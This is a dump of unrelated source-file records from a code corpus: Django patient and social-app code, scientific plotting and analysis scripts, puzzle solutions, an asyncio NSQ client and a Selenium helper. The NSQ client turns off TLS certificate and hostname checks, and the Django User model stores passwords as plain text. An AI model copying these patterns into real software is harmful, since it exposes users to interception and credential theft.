connection\t\n\t\tcursor.execute(\n\t\t\"update ai_pacientes set coordenadas = %s where rut = %s\",[coordenadas,rut_aux])\n\t\treturn redirect('ActualizaPac',paciente_id) # ficha paciente\n\tcontext = {\n\t\t\"variable1\":variable1,\n\t\t\"form\":form,\n\t\t\"variable2\":variable2,\n\t\t'paciente_id':paciente_id,\t\t\n\t\t}\n\treturn render(request,'ficha_coordenadas.html',context)\n\n@login_required(login_url='login_ini')\ndef georeferencia(request):\n\tvariable1 = 'Geo-referencia'\n\tsincoordenadas = '0'\n\trut_aux = 
request.session.get('rut_x') # rescata variable global \n\tpaciente = Pacientes.objects.get(rut=rut_aux) # busca\n\tpaciente_id = paciente.id\n\tcoordenadas = paciente.coordenadas\n\n\tif coordenadas is None:\n\t\t#context = {'sincoordenadas':sincoordenadas,'paciente_id':paciente_id}\n\t\treturn HttpResponse(\"Ficha no posee coordenadas de georreferenciación\")\n\t\t#messages.info(request, 'Ficha sin coordenadas de georreferencia')\n\t\t#return redirect('ActualizaPac',paciente_id) # ficha paciente\n\n\tlat = coordenadas[0:10]\n\tlng = coordenadas[12:22]\n\tcontext = {\n\t\t'variable1':variable1,\n\t\t'paciente_id':paciente_id,\n\t\t'variable3':paciente.nombre,\n\t\t'lat':lat,\n\t\t'lng':lng,\n\t\t'sincoordenadas':1,\n\t}\t\n\t#return render(request,'georeferencia.html',context)\n\treturn render(request,'ejemplo_georeferencia.html',context)","sub_path":"misitio/ai/views - copia.py","file_name":"views - copia.py","file_ext":"py","file_size_in_byte":172955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"368602470","text":"from django.db import models\r\n\r\nclass User(models.Model): \r\n    username = models.CharField(max_length=255)\r\n    password = models.CharField(max_length=255)\r\n    email = models.CharField(max_length=255)\r\n    telefono = models.CharField(max_length=255, null=True)\r\n    nombre = models.CharField(max_length=255)\r\n    imagen = models.ImageField(upload_to='static/images/usuarios/', blank=True, null=True)\r\n    fecha = models.DateTimeField(auto_now_add=True)\r\n    \r\nclass Historia(models.Model):\r\n    id_usuario = models.ForeignKey(User, on_delete=models.CASCADE)\r\n    imagen = models.ImageField(upload_to='static/images/historias/', blank=True, null=True)\r\n    fecha = models.DateTimeField(auto_now_add=True)\r\n\r\nclass Pub(models.Model):\r\n    id_usuario = models.ForeignKey(User, on_delete=models.CASCADE)\r\n    imagen = models.ImageField(upload_to='static/images/publicaciones/', blank=True, null=True)\r\n    mensaje = models.TextField()\r\n    fecha = models.DateTimeField(auto_now_add=True)\r\n    \r\nclass PubComentario(models.Model):\r\n    id_publicacion = models.ForeignKey(Pub, on_delete=models.CASCADE)\r\n    id_usuario = models.ForeignKey(User, on_delete=models.CASCADE)\r\n    mensaje = models.TextField()\r\n    \r\nclass PubLike(models.Model):\r\n    id_publicacion = models.ForeignKey(Pub, on_delete=models.CASCADE)\r\n    id_usuario = models.ForeignKey(User, on_delete=models.CASCADE)\r\n    \r\nclass Follow(models.Model):\r\n    id_usuario = models.ForeignKey(User, on_delete=models.CASCADE, related_name='id_usuario')\r\n    id_usuario_seguido = models.ForeignKey(User, on_delete=models.CASCADE, related_name='id_usuario_seguido')","sub_path":"Alejandro/app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"585276184","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ninlinks, inpackages = [], []\nwith open('in_squeeze.dat') as inData:\n    for line in inData:\n        data = line.split()\n        inlinks.append(float(data[0]))\n        inpackages.append(float(data[1]))\n\noutlinks, outpackages = [], []\nwith open('out_squeeze.dat') as inData:\n    for line in inData:\n        data = line.split()\n        outlinks.append(float(data[0]))\n        outpackages.append(float(data[1]))\n\n\ndef N(t, nu, c, lamda):\n    return nu+(c*c)*((t+lamda)**(-2))\n\n\nX1 = np.linspace(start=1, stop=47, num=1000)\nX2 = np.linspace(start=1, stop=47, 
num=1000)\nnuinlinks, cinlinks, lamdainlinks = -28.0, 265.0, 2.2\nNinlinks = N(X1, nuinlinks, cinlinks, lamdainlinks)\nnuoutlinks, coutlinks, lamdaoutlinks = 1.0, 110.0, 0.45\nNoutlinks = N(X2, nuoutlinks, coutlinks, lamdaoutlinks)\n\nplt.figure()\nplt.plot(inlinks, inpackages, '+')\nplt.xscale('log')\nplt.yscale('log')\nplt.plot(X1, Ninlinks, 'r--', lw=1)\n\nplt.figure()\nplt.plot(outlinks, outpackages, '+')\nplt.xscale('log')\nplt.yscale('log')\nplt.plot(X2, Noutlinks, 'r--', lw=1)\n\nplt.show()\n","sub_path":"SC/465_multidisciplinary_problems/arnab_ray/2019/assignments/debian/debian.py","file_name":"debian.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"41740473","text":"from statistics import median\n\n\ndef median_three(els):\n    # keep the first two values, then append the median of each 3-element window\n    return els[:2] + [median(els[n:n + 3]) for n in range(len(els) - 2)]\n\n\nif __name__ == '__main__':\n    print(\"Example:\")\n    print(list(median_three([1, 2, 3, 4, 5, 6, 7])))\n\n    # These \"asserts\" are used for self-checking and not for auto-testing\n    assert list(median_three([1, 2, 3, 4, 5, 6, 7])) == [1, 2, 2, 3, 4, 5, 6]\n    assert list(median_three([1])) == [1]\n    print(\"Coding complete? Click 'Check' to earn cool rewards!\")\n","sub_path":"O'Reilly/median_of_three.py","file_name":"median_of_three.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"564755690","text":"\"\"\"\r\nCount multiple patterns in the tags\r\n\"\"\"\r\n\r\nimport xml.etree.cElementTree as ET\r\nimport pprint\r\nimport re\r\n\r\nfrom collections import defaultdict\r\n\r\nlower = re.compile(r'^([a-z]|_)*$')\r\nlower_colon = re.compile(r'^([a-z]|_)*:([a-z]|_)*$')\r\nproblemchars = re.compile(r'[=\\+/&<>;\\'\"\\?%#$@\\,\\. \\t\\r\\n]')\r\n\r\nOSMFILE = \"Beaverton.osm\"\r\n\r\n# Classifies the 'k' attribute of a tag element with the regexes above. \r\ndef key_type(element, keys):\r\n    '''\r\n    This function utilizes regex to pull all the tags in the file and \r\n    count the occurrences of types of tags to estimate how many different \r\n    types of tags there are and how many potential problems there could be.\r\n    Args:\r\n        element(string): element in the file. \r\n        keys(dictionary): Dictionary used to keep count of elements.\r\n    Returns:\r\n        Dictionary: the keys\r\n    '''\r\n    if element.tag == \"tag\":\r\n        for tag in element.iter('tag'):\r\n            k = tag.get('k')\r\n            if lower.search(k):\r\n                keys['lower'] = keys['lower'] + 1\r\n            elif lower_colon.search(k):\r\n                keys['lower_colon'] = keys['lower_colon'] + 1\r\n            elif problemchars.search(k):\r\n                keys['problemchars'] = keys['problemchars'] + 1\r\n            else:\r\n                keys['other'] = keys['other'] + 1\r\n    \r\n    return keys\r\n\r\n# Counts the different tags in the file. 
\r\ndef process_map(filename):\r\n keys = {\"lower\": 0, \"lower_colon\": 0, \"problemchars\": 0, \"other\": 0}\r\n for _, element in ET.iterparse(filename):\r\n keys = key_type(element, keys)\r\n\r\n return keys\r\n\r\nif __name__ == \"__main__\":\r\n pprint.pprint(process_map(OSMFILE))\r\n","sub_path":"tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"263884289","text":"#!/home/birac/anaconda2/bin/python\nfrom modeller import *\nfrom modeller.automodel import *\nimport re\nfrom Bio.PDB import *\nimport textwrap \n\n# Define these\narray = ['WT', 'E643Q', 'D646N', 'BOTH']\nchains = ['C']\nresidues_to_model = ['42','61']\n\ndef get_chains(chain_id):\n parser = PDBParser()\n structure = parser.get_structure(protein, '%s.pdb' % protein)\n class ChainSelect(Select):\n def accept_chain(self, chain):\n if chain.get_id() == '%s' % chain_id:\n return 1\n else:\n return 0\n io = PDBIO()\n io.set_structure(structure)\n io.save('%s_%s.pdb' % (protein, chain_id), ChainSelect() )\n\ndef make_sequence_align(chain_id):\n io = PDBIO()\n parser = PDBParser()\n ppb = PPBuilder()\n structure = parser.get_structure(protein, '%s_%s.pdb' % (protein, chain_id))\n f = open('%s_%s.ali' % (protein, chain_id), 'w')\n f.write('>P1;%s\\n' % protein)\n f.write('sequence:%s::::::::\\n' % protein)\n for pp in ppb.build_peptides(structure):\n seq = str(pp.get_sequence()) \n f.write('%s' % seq)\n f.write('*')\n env = environ()\n aln = alignment(env)\n mdl = model(env, file='3din_%s.pdb' % chain_id) #, model_segment=('FIRST:A','LAST:A'))\n aln.append_model(mdl, align_codes='3din', atom_files='3din_%s.pdb' % chain_id)\n aln.append(file='%s_%c.ali' % (protein, chain_id), align_codes='%s' % protein)\n aln.align2d()\n aln.write(file='%s-3din.ali' % protein, alignment_format='PIR')\n\ndef loop(prot, start, end):\n log.verbose()\n env = environ()\n class MyLoop(loopmodel):\n def select_loop_atoms(self):\n startint = int(start)\n endint = int(end)\n return selection(self.residue_range(startint, endint))\n m = MyLoop(env, inimodel='%s.pdb' % prot, sequence=prot)\n m.loop.starting_model= 1\n m.loop.ending_model = 10\n m.loop.md_level = refine.very_fast\n m.make()\n \nclass MyModel(automodel):\n def select_atoms(self):\n return selection(self.residue_range('246', '249'))\n'''\na = MyModel(env, alnfile = 'mafft.ali',\n knowns = 'Tom_model', sequence = 'Tom_loops')\na.starting_model= 1\na.ending_model = 1\n'''\n \nfor protein in array:\n for chain_id in chains:\n get_chains(chain_id)\n make_sequence_align(chain_id)\n #loop('%s_%s' % (protein, chain_id), residues_to_model[0], resdiues_to_model[1])\n","sub_path":"Atomistic/make_3dins_mut.py","file_name":"make_3dins_mut.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"290258838","text":"\nimport itertools\ndef next_closest_time(time):\n h, m = time.split(':')\n input_time = list(map(int, [h[0],h[1],m[0],m[1]]))\n hours = set((filter(check_valid, permutations(input_time))))\n hours.remove(tuple(input_time))\n if not hours:\n return to_str(to_minute(input_time))\n nearest_diff = 60*24\n ans = 0\n\n for i in hours:\n t = to_minute(i)\n # print(to_str(t))\n if t < to_minute(input_time):\n t += 60*24\n if t - to_minute(input_time) < nearest_diff :\n nearest_diff = t - to_minute(input_time)\n ans = t\n ans = (ans + 60*24) % (60*24)\n return to_str(ans)\n\n\ndef 
check_valid(t):\n hour = t[0]*10 + t[1]\n minute = t[2]*10 + t[3]\n return hour < 24 and minute < 60\n\ndef permutations(n):\n hours = list(itertools.product([n[0],n[1],n[2],n[3]],repeat=4))\n return hours\n\ndef to_minute(t):\n hour = t[0]*10 + t[1]\n minute = t[2]*10 + t[3]\n return hour*60 + minute\n\ndef to_str(m):\n return \"{:02d}:{:02d}\".format(*divmod(m,60))\n\n\nprint(next_closest_time(\"11:11\"))\n# print(to_minute([1,9,3,4]))\n# print(to_str(1174))\n","sub_path":"next_closest_time.py","file_name":"next_closest_time.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"590097165","text":"\"\"\"\nAuthor: Yvette WANG\n\"\"\"\nfrom collections import defaultdict\n\n\n# medium, v2, dp, bottom-up, 76ms\nclass Solution:\n def numsSameConsecDiff(self, N, K):\n \"\"\"\n :type N: int\n :type K: int\n :rtype: List[int]\n \"\"\"\n\n results = []\n\n closed = defaultdict(list)\n\n if N == 1:\n return list(range(0, 10))\n else:\n for i in range(0, 10):\n closed[(i, 1)] = [str(i)]\n count = 1\n while count < N:\n count += 1\n for i in range(0, 10):\n for cand in [i + K, i - K]:\n if -1 < cand < 10:\n closed[(i, count)] += [str(i) + res for res in closed[(cand, count - 1)]]\n\n for x in range(1, 10):\n results += [int(res) for res in closed[(x, N)]]\n\n return list(set(results))\n\n\n# # medium, v1, dp, recursion, 80ms\n# class Solution:\n# def numsSameConsecDiff(self, N, K):\n# \"\"\"\n# :type N: int\n# :type K: int\n# :rtype: List[int]\n# \"\"\"\n#\n# self.K = K\n# self.closed = defaultdict(list)\n#\n# results = []\n#\n# if N == 1:\n# return list(range(0, 10))\n# else:\n# for x in range(1, 10):\n# results += [int(str(x) + res) for res in self.getConsec(N - 1, x)]\n#\n# return list(set(results))\n#\n# def getConsec(self, remain, last):\n# if remain == 0:\n# self.closed[(remain, last)] = ['']\n# elif self.closed.get((remain, last), 0) == 0:\n# for cand in [last + self.K, last - self.K]:\n# if -1 < cand < 10:\n# self.closed[(remain, last)] += [str(cand) + res for res in self.getConsec(remain - 1, cand)]\n#\n# return self.closed[(remain, last)]\n\n\nif __name__ == \"__main__\":\n N = 3\n K = 7\n print(Solution().numsSameConsecDiff(N, K))\n ","sub_path":"967. Numbers With Same Consecutive Differences.py","file_name":"967. 
Numbers With Same Consecutive Differences.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"594003396","text":"import sys, os\nimport numpy as np\nimport h5py as h5\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport matplotlib as mpl\nimport palettable\nimport pylab\nfrom scipy.interpolate import interp1d\n\ncosmo_dir = os.path.dirname(os.path.dirname(os.getcwd())) + '/'\nsubDirectories = [x[0] for x in os.walk(cosmo_dir)]\nsys.path.extend(subDirectories)\nfrom tools import *\nfrom constants_cgs import *\nfrom spectra_functions import *\nfrom statistics_functions import get_highest_probability_interval\nfrom load_tabulated_data import load_power_spectrum_table, load_tabulated_data_boera, load_tabulated_data_viel\n\noutputs_file = '../../scale_outputs/outputs_cosmo_2048.txt'\noutputs = np.loadtxt( outputs_file )\n\ntransparent = True\n\n\n\n#Cosmological Parameters \nH0 = 67.66 \ncosmo_h = H0 / 100\nOmega_M = 0.3111\nOmega_L = 0.6889\n\n\n#Box parameters\nLbox = 50.0 #Mpc/h\nnPoints = 2048\nnx = nPoints\nny = nPoints\nnz = nPoints\nncells = nx * ny * nz\n\ndataDir = '/data/groups/comp-astro/bruno/'\n# dataDir = '/home/bruno/Desktop/ssd_0/data/'\n\nuvb = 'pchw18'\n# uvb = 'hm12'\ninput_dir = dataDir + 'cosmo_sims/{0}_hydro_50Mpc/skewers_{1}/'.format(nPoints, uvb, )\noutput_dir = dataDir + 'cosmo_sims/{0}_hydro_50Mpc/optical_depth_{1}/'.format(nPoints, uvb, )\ncreate_directory( output_dir )\n\n# snapshots_indices = [74, 77, 80, 83, 86, 90, 93, 96, 99, 102, 106, 110, 114, 119, 124, 130, 136, 143, 151, 159, 169]\n# snapshots_indices = [74, 76, 77, 79, 80, 82, 83, 85, 86, 88, 90, 91, 93, 94, 96, 97, 99, 101, 102, 104, 106, 108, 110, 112, 114, 117, 119, 122, 124, 127, 130, 133, 136, 139, 143, 147, 151, 155, 159, 164, 169]\nsnapshots_indices = list(range( 74, 170, 1))\n\nuse_mpi = True\n\nif use_mpi :\n from mpi4py import MPI\n comm = MPI.COMM_WORLD\n rank = comm.Get_rank()\n nprocs = comm.Get_size()\nelse:\n rank = 0\n nprocs = 1\n\n\nnSnap = snapshots_indices[rank]\n\n\n\nprint(\"nSnap: {0}\".format(nSnap))\n\noutputFileName = output_dir + 'optical_depth_{0}_interpolated.h5'.format(nSnap)\noutFile = h5.File( outputFileName, 'w')\n\nskewer_axis = 'x'\n\nn_skewers_total = 256**2\nn_skewers = 128*128\nskewers_ids = np.linspace(0, n_skewers-1, n_skewers ).astype(np.int) * n_skewers_total / n_skewers\n\n\ncosmo_spaces = [ 'real', 'redshift' ]\n\nfor space in cosmo_spaces:\n\n space_group = outFile.create_group( space )\n\n tau_vals = []\n F_mean_vals = []\n\n for i,skewer_id in enumerate(skewers_ids):\n #Load skewer data\n\n if i%(n_skewers/64)==0: \n text = ' Skewer {0}/{1}'.format(i, n_skewers)\n if rank==0:print_line_flush( text )\n inFileName = input_dir + 'skewers_{0}_{1}.h5'.format(skewer_axis, nSnap)\n inFile = h5.File( inFileName, 'r' )\n current_z = inFile.attrs['current_z']\n skewer_data = inFile[str(skewer_id)]\n density = skewer_data['density'][...]\n HI_density = skewer_data['HI_density'][...]\n temperature = skewer_data['temperature'][...]\n velocity = skewer_data['velocity'][...]\n inFile.close()\n\n\n x_comov, vel_Hubble, n_HI_los, tau_redshift = compute_optical_depth( H0, cosmo_h, Omega_M, Omega_L, Lbox, nPoints, current_z, density, HI_density, temperature, velocity, space=space )\n dv = ( vel_Hubble[1:] - vel_Hubble[:-1] )[0]\n\n F = np.exp(-tau_redshift)\n \n F_mean = F.mean()\n tau_eff = -1 * np.log( F_mean )\n tau_vals.append( tau_eff )\n 
F_mean_vals.append( F_mean )\n\n\n tau_vals = np.array( tau_vals )\n F_mean_vals = np.array( F_mean_vals )\n\n\n space_group.attrs['n_skewers'] = n_skewers\n space_group.create_dataset( 'tau_vals', data=tau_vals)\n space_group.create_dataset( 'F_mean_vals', data=F_mean_vals)\n\n#Save Optical Depth data\noutFile.attrs['current_z'] = current_z\n\noutFile.close()\nprint(\"\\nSaved File: \", outputFileName)\n\n\n","sub_path":"analysis/transmited_flux/old/get_optical_depth_interpolated.py","file_name":"get_optical_depth_interpolated.py","file_ext":"py","file_size_in_byte":3690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"624851822","text":"import asyncio\nimport atexit\nimport json\nimport logging\nimport socket\nimport ssl\nfrom .exceptions import AuthFailedError\nfrom .exceptions import IdentifyFailedError\nfrom .exceptions import ServerError\nfrom .handlers import DeflateHandler, SnappyHandler\nfrom .helpers import prepare_cmd, to_size, parse_frame\nfrom aionsq.util import parse_addr\n\n\nclass Connection:\n\n def __init__(self, addr, *, auth_secret=None, cert=None, loop=None):\n self.addr = parse_addr(addr, host='127.0.0.1', proto='tcp')\n self.auth_secret = auth_secret\n self.cert = cert\n self.log = logging.getLogger(__name__)\n self.loop = loop or asyncio.get_event_loop()\n self._started = False\n self.sock = None\n self.z = None\n self.message_listeners = set()\n\n self.max_bytes = 16 * 1024\n self._buf = bytearray()\n\n def add_message_listener(self, callback):\n self.message_listeners.add(callback)\n\n async def start(self):\n if not self._started:\n infos = await self.loop.getaddrinfo(*self.addr,\n family=socket.AF_INET,\n type=socket.SOCK_STREAM)\n *opts, _, addr = infos[0]\n self.sock = socket.socket(*opts)\n self.sock.settimeout(0)\n resp = await self.loop.sock_connect(self.sock, addr)\n atexit.register(self.close)\n self.log.error(resp)\n self.sock.send(b' V2')\n self._started = True\n self.log.info('started')\n\n def close(self):\n self.sock.close()\n\n async def connect(self, **opts):\n from aionsq import __version__\n opts.setdefault('user_agent', 'aionsq/%s' % __version__)\n opts.setdefault('client_id', socket.getfqdn())\n opts.setdefault('hostname', socket.gethostname())\n opts.setdefault('feature_negotiation', True)\n if 'deflate' in opts:\n opts.setdefault('deflate_level', 6)\n data = json.dumps(opts)\n await self.cmd('IDENTIFY', body=data)\n features = await self.json()\n self.log.info('features %s', features)\n self.max_bytes = features['output_buffer_size']\n if features['tls_v1']:\n await self.upgrade_tls_v1(self.cert)\n if features['deflate']:\n await self.upgrade_deflate(6)\n if features['snappy']:\n await self.upgrade_snappy()\n if features['auth_required']:\n if not self.auth_secret:\n self.log.warning('auth required but auth_secret not set')\n auth_secret = self.auth_secret or '-'\n await self.cmd('AUTH', body=auth_secret)\n status = await self.json()\n self.log.info('auth status %s' % status)\n\n # TODO activate async now !!!()\n self.make_async()\n return features\n\n def make_async(self):\n self.loop.add_reader(self.sock.fileno(), self._read_ready)\n\n def bufferize_chunk(self, chunk):\n if self.z:\n chunk = self.z.decompress(chunk)\n self._buf += chunk\n\n async def upgrade_tls_v1(self, cert=None):\n self.log.info('upgrade tls')\n ctx = ssl.create_default_context()\n ctx.check_hostname = False\n ctx.verify_mode = ssl.CERT_NONE\n if isinstance(cert, (list, tuple)):\n ctx.load_cert_chain(*cert)\n if 
isinstance(cert, dict):\n ctx.load_cert_chain(**cert)\n if isinstance(cert, str):\n ctx.load_cert_chain(cert)\n\n sock = ctx.wrap_socket(self.sock,\n server_side=False,\n do_handshake_on_connect=False)\n\n while True:\n try:\n sock.do_handshake()\n except ssl.SSLWantReadError:\n continue\n except ssl.SSLWantWriteError:\n continue\n break\n self.sock = sock\n await self.ok()\n\n async def upgrade_deflate(self, level):\n self.log.info('upgrade deflate')\n self.z = DeflateHandler(level)\n if len(self._buf):\n self._buf[:] = self.z.decompress(self._buf)\n self.log.warning('decompressed %s', self._buf)\n await self.ok()\n return\n\n async def upgrade_snappy(self):\n self.log.info('upgrade snappy')\n self.z = SnappyHandler()\n if len(self._buf):\n self._buf[:] = self.z.decompress(self._buf)\n self.log.warning('decompressed %s', self._buf)\n await self.ok()\n return\n\n async def cmd(self, cmd, *params, body=None):\n msg = prepare_cmd(cmd, *params, body=body)\n self.log.info('send %s', msg)\n await self.write(msg)\n\n async def write(self, msg):\n self.log.debug('write %s', msg)\n if self.z:\n msg = self.z.compress(msg)\n\n await self.loop.sock_sendall(self.sock, msg)\n\n def notify_listeners(self, frame):\n if frame.type == 0 and frame.body == '_heartbeat_':\n self.loop.create_task(self.send('NOP'))\n return\n elif frame.type == 0:\n self.log.debug('got %s', frame)\n return\n elif frame.type == 1 and frame.error in ('E_FIN_FAILED',\n 'E_REQ_FAILED',\n 'E_TOUCH_FAILED'):\n self.log.warning('failure %s', frame)\n return\n elif frame.type == 1:\n self.log.error('failure %s', frame)\n raise exc(frame)\n elif frame.type == 2:\n for listener in self.message_listeners:\n listener(frame)\n return\n raise NotImplementedError()\n\n async def json(self):\n data = await self.read()\n data = json.loads(data)\n self.log.debug('read json %s', data)\n return data\n\n async def ok(self):\n data = await self.read()\n return data == b'OK'\n\n def _read_ready(self):\n try:\n mbytes = self.max_bytes\n data = self.sock.recv(mbytes)\n self._data_received(data)\n except (BlockingIOError, InterruptedError, ssl.SSLWantReadError):\n return\n except Exception as error:\n self.log.exception(error)\n self.close()\n\n def _data_received(self, data):\n self.bufferize_chunk(data)\n while len(self._buf) > 4:\n data = self._buf[:4]\n size = to_size(data)\n self.log.debug('read size %s', size)\n if len(self._buf) < (4 + size):\n return\n\n data, self._buf[:4 + size] = self._buf[4:4 + size], []\n self.log.debug('read data %s', data)\n frame = parse_frame(data)\n self.notify_listeners(frame)\n\n async def _read(self, size):\n while len(self._buf) < size:\n chunk = bytearray()\n while True:\n try:\n mbytes = self.max_bytes\n chunk += await self.loop.sock_recv(self.sock, mbytes)\n except ssl.SSLWantReadError:\n continue\n else:\n break\n self.log.debug('read %s', chunk)\n self.bufferize_chunk(chunk)\n data, self._buf[:size] = self._buf[:size], []\n return data\n\n async def read(self):\n block = await self._read(4)\n size = to_size(block)\n self.log.debug('read size %s', size)\n data = await self._read(size)\n self.log.debug('read data %s', data)\n frame = parse_frame(data)\n self.log.debug('read frame %s', frame)\n if frame.type == 0:\n return frame.body\n if frame.type == 1:\n # fail fast\n raise exc(frame)\n # unexcepted\n raise Exception(frame)\n\n\ndef exc(frame):\n if frame.error == 'E_AUTH_FAILED':\n return AuthFailedError(frame.body)\n if frame.error == 'E_IDENTIFY_FAILED':\n return IdentifyFailedError(frame.body)\n return 
ServerError(frame)\n","sub_path":"aionsq/tcp/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":8063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"609380350","text":"#encoding=utf-8\n\n\nfrom selenium.webdriver.chrome.webdriver import WebDriver as ChromeDriver\nfrom selenium.webdriver.ie.webdriver import WebDriver as InternetExplorerDriver\nfrom selenium.webdriver.firefox.webdriver import WebDriver as FirefoxDriverDriver\n\nfrom selenium.webdriver import ChromeOptions\n\nclass DriverInit(object):\n logger=None\n \n def __init__(self,logger):\n self.logger=logger\n\n def getWebDriver(self, browser):\n print(browser) \n \n if browser.upper()==\"IE\":\n driver= InternetExplorerDriver()\n driver.maximize_window()\n self.logger.appendContent(\"新建IE驱动\")\n return driver\n elif browser.upper()==\"CHROME\":\n options = ChromeOptions()\n options.add_argument(\"test-type\")\n driver=ChromeDriver(chrome_options=options)\n driver.maximize_window()\n self.logger.appendContent(\"新建chrome驱动\")\n return driver\n elif browser.upper()==\"FIREFOX\":\n driver= FirefoxDriverDriver()\n driver.maximize_window()\n self.logger.appendContent(\"新建FireFox驱动\")\n return driver\n else:\n return None\n \n \n","sub_path":"CaseManager/bin/Debug/PythonSelenium2/src/frame/DriverInit.py","file_name":"DriverInit.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"63618144","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 21 20:39:10 2020\r\n\r\n@author: daniel\r\n\"\"\"\r\n\r\nimport os\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import Image, ImageDraw\r\nimport copy\r\nfrom shapely.geometry import Polygon, Point\r\nimport re\r\nimport numpy as np\r\n\r\n\r\n# start: read in data ---------------------------------------------------------\r\n\r\npath = os.getcwd()+\"/PatRec17_KWS_Data-master\\ground-truth\\locations\"\r\nground_truth = list()\r\nfor i in os.listdir(path):\r\n ground_truth.append([])\r\n paths = os.getcwd()+\"/PatRec17_KWS_Data-master\\ground-truth\\locations/\"+i\r\n with open(paths, \"r\") as data: \r\n for i in data:\r\n ground_truth[len(ground_truth)-1].append(i.split(\",\")) \r\n data.close()\r\n\r\n\r\n\r\npath = os.getcwd()+\"/PatRec17_KWS_Data-master/images/images_bw\"\r\nimages = list()\r\nfor i in os.listdir(path):\r\n paths = os.getcwd()+\"/PatRec17_KWS_Data-master\\images/images_bw/\"+i\r\n images.append(copy.deepcopy(np.asarray(Image.open(paths).convert(\"RGBA\"))))\r\n\r\n\r\n\r\n\r\n\r\nfor i,j in enumerate(ground_truth):\r\n current_image = images[i]\r\n \r\n new_folder = os.getcwd() + f\"/for_image_{i}\"\r\n \r\n if not os.path.exists(new_folder):\r\n os.mkdir(new_folder)\r\n \r\n for z,p in enumerate(j):\r\n\r\n polygon_cordinated = re.findall(r\" +\\d+\\.\\d+\", str(p))\r\n \r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n if len(polygon_cordinated) == 0:\r\n pass\r\n else:\r\n \r\n \r\n \r\n \r\n poly = list()\r\n tup = list()\r\n for i,c in enumerate(polygon_cordinated):\r\n if(i > 0 and i%2 == 0):\r\n poly.append(tuple(tup))\r\n tup = list()\r\n tup.append(eval(c.strip()))\r\n poly.append(tuple(tup))\r\n \r\n\r\n \r\n #polygon cut\r\n \r\n mask_img = Image.new(\"L\" , (current_image.shape[1],current_image.shape[0]), 0)\r\n ImageDraw.Draw(mask_img).polygon(poly, outline = 1, fill = 1)\r\n mask = np.asarray(mask_img)\r\n \r\n \r\n\r\n if len(current_image.shape) == 3:\r\n current_image = 
current_image[:,:,0]\r\n \r\n cut_img = np.empty(current_image.shape)\r\n \r\n\r\n \r\n\r\n \r\n \r\n \r\n\r\n \r\n cut_img[:,:] = current_image[:,:]*mask\r\n \r\n \r\n \r\n #Image.fromarray(cut_img).show()\r\n \r\n indexes = np.where(mask)\r\n \r\n \r\n\r\n\r\n print(cut_img)\r\n \r\n \r\n \r\n if len(indexes[0]) == 0:\r\n pass\r\n else:\r\n \r\n row_max = np.max(indexes[0])\r\n row_min = np.min(indexes[0])\r\n \r\n col_max = np.max(indexes[1])\r\n col_min = np.min(indexes[1])\r\n \r\n \r\n \r\n cut_img = Image.fromarray(cut_img).crop((col_min,row_min, col_max,row_max))\r\n \r\n # cut_img.show()\r\n \r\n cut_img = cut_img.convert(\"L\")\r\n \r\n cut_img.save(new_folder + f\"/word_{z}.png\", \"png\")\r\n \r\n \r\n \r\n \r\n \r\n \"\"\"\r\n cut_image = np.zeros((images[0].shape[0],images[0].shape[1]))+ 255\r\n count = 0\r\n for i,j in np.ndenumerate(images[0]):\r\n row, col = i\r\n \r\n if (row%100 == 0) and (col %10000 == 0):\r\n # print(row)\r\n a=5 \r\n \r\n if Polygon(poly).contains(Point(col,row)):\r\n cut_image[row][col] = images[0][row][col]\r\n count += 1\r\n \r\n cut_image[cut_image <= 10] = 0\r\n cut_image[cut_image > 10] = 255\r\n \r\n cut_cut_image = cut_image[cut_image < 255]\r\n print(cut_cut_image)\r\n Image.fromarray(cut_image).show()\r\n \r\n \"\"\"\r\n\r\n\r\n# end: read in data -----------------------------------------------------------","sub_path":"Word_extraction_ala_daniel.py","file_name":"Word_extraction_ala_daniel.py","file_ext":"py","file_size_in_byte":4283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"39221522","text":"# -*- encoding: utf-8 -*-\n\nfrom js.bytecode import to_code, ByteCode, \\\n LOAD_CONSTANT_FLOAT, RETURN, JUMP_IF_FALSE, JUMP_ABSOLUTE\nfrom js.interpreter import Frame, interpret, interpret_source\nfrom js.base_objects import W_FloatObject, W_BoolObject\n\n\ndef test_frame():\n bc = ByteCode('', ['x', 'y'], [], [], [])\n frame = Frame(bc)\n assert len(frame.vars) == 2\n assert frame.valuestack_pos == 0\n x, y = object(), object()\n frame.push(x)\n assert frame.valuestack_pos == 1\n res = frame.pop()\n assert res is x\n assert frame.valuestack_pos == 0\n frame.push(x)\n frame.push(y)\n assert frame.valuestack_pos == 2\n res = frame.pop()\n assert res is y\n assert frame.valuestack_pos == 1\n\n\ndef test_load_constant():\n bc = ByteCode(to_code([\n 